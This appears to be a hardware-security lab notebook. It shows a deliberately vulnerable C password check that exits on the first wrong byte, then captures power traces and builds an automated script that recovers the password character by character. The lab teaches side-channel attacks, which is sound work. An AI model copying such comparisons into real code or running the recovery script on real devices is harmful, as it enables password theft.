# Timing analysis on password check

## Password check

```c
uint8_t check_password(uint8_t cmd, uint8_t scmd, uint8_t len, uint8_t *input)
{
    trigger_high();

    uint8_t password_correct = 1;
    for (unsigned int i = 0; i < sizeof(stored_password) - 1; i++)
    {
        if (stored_password[i] != input[i])
        {
            password_correct = 0;
            break;
        }
    }

    trigger_low();

    simpleserial_put(0x01, 1, &password_correct);
    return 0;
}

int main(void)
{
    platform_init();
    init_uart();
    trigger_setup();

    simpleserial_init();
    simpleserial_addcmd(0x01, 0, check_password);
    while (1)
        simpleserial_get();
}
```

### Side note

The code above is not only prone to timing analysis:
- Initialization of `password_correct = 1` can be utilized in fault attacks.
- Looping until `sizeof(stored_password) - 1` can cause out of bounds accesses on `input`.

### Download and test

In [ ]:
import securec
import securec.util
scope, target = securec.util.init()
scope.default_setup()

In [ ]:
securec.util.compile_and_flash('./example_2.c')

In [ ]:
securec.util.reset_target()
target.simpleserial_write(0x01, b'hello!')
bytes(target.simpleserial_read(0x01))

In [ ]:
target.simpleserial_write(0x01, b'world')
bytes(target.simpleserial_read(0x01))

### Capturing traces

In [ ]:
scope.default_setup()
def capture(attempt):
    scope.adc.samples = 500
    scope.arm()
    target.simpleserial_write(0x01, attempt.encode())
    trace = securec.util.capture()
    return trace, bool(target.simpleserial_read(0x01)[0])

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool
from bokeh.palettes import Category10_10

output_notebook()

In [ ]:
trace, result = capture('hello world')
p = figure(height=300, sizing_mode='stretch_width')
p.add_tools(CrosshairTool())
p.line(range(0, len(trace)), trace)
show(p)

## Recording different attempts

In [ ]:
def plot_attempts(attempts):
    data = []
    for attempt in attempts:
        data.append(capture(attempt))
    p = figure(height=300, sizing_mode='stretch_width')
    p.add_tools(CrosshairTool())
    for idx, (attempt, (trace, result)) in enumerate(zip(attempts, data)):
        p.line(range(0, len(trace)), trace - idx * 0.6, line_color=Category10_10[idx], legend_label=f'{attempt} -> {result}')
    show(p)

In [ ]:
plot_attempts(['hello', 'world', 'ifx'])

## Exploit differences

In [ ]:
def plot_difference(attempts):
    data = []
    for attempt in attempts:
        data.append(capture(attempt)[0])
    p = figure(height=300, sizing_mode='stretch_width', tooltips=[('data', '$name')])
    p.add_tools(CrosshairTool())
    ref_attempt = attempts[0]
    ref_trace = data[0]
    for idx, (attempt, trace) in enumerate(zip(attempts[1:], data[1:])):
        p.line(
            range(0, len(trace)), 
            abs(ref_trace - trace) - 0.6 * idx, 
            line_color=Category10_10[idx % 10], 
            legend_label=f'abs({ref_attempt} - {attempt})',
            name=f'abs({ref_attempt} - {attempt})',
        )
    show(p)


In [ ]:
plot_difference(['hello', 'world', 'ifx'])

In [ ]:
plot_difference(['hello'] + [f'i{n}' for n in 'abcdefghijklmnopqrstuvwxyz'])

In [ ]:
# Next character?

## Attack!

Define a quantity to highlight traces with more right characters.

#### The sum of absolute differences

Given two traces $t_1, t_2$ their SAD value is defined as:
$$\text{SAD}(t_1, t_2) := \sum_i \big| t_1[i] - t_2[i] \big|,$$
where $t[i]$ is the value of trace $t$ at point $i$.

In [ ]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

### Automate attack

In [ ]:
def attack_password_sad(
    sad_threshold=10,
    charlist='abcdefghijklmnopqrstuvwxyz'
):
    result = False
    password = ''

    while not result or len(password) > 9:
        basetrace, _ = capture(password)
        for c in charlist:
            trace, result = capture(password + c)
            if sad(trace, basetrace) > sad_threshold:
                password += c
                print(f'success: "{c}" => password = {password}')
                break
        else:
            print('no found')
            break
    return password, result

In [ ]:
attack_password_sad()

## Summary

✓ Standard memory comparison (i.e. exit on first difference) is prone to timing attacks.

✓ Sum of absolute differences can be used to identify traces with different run times.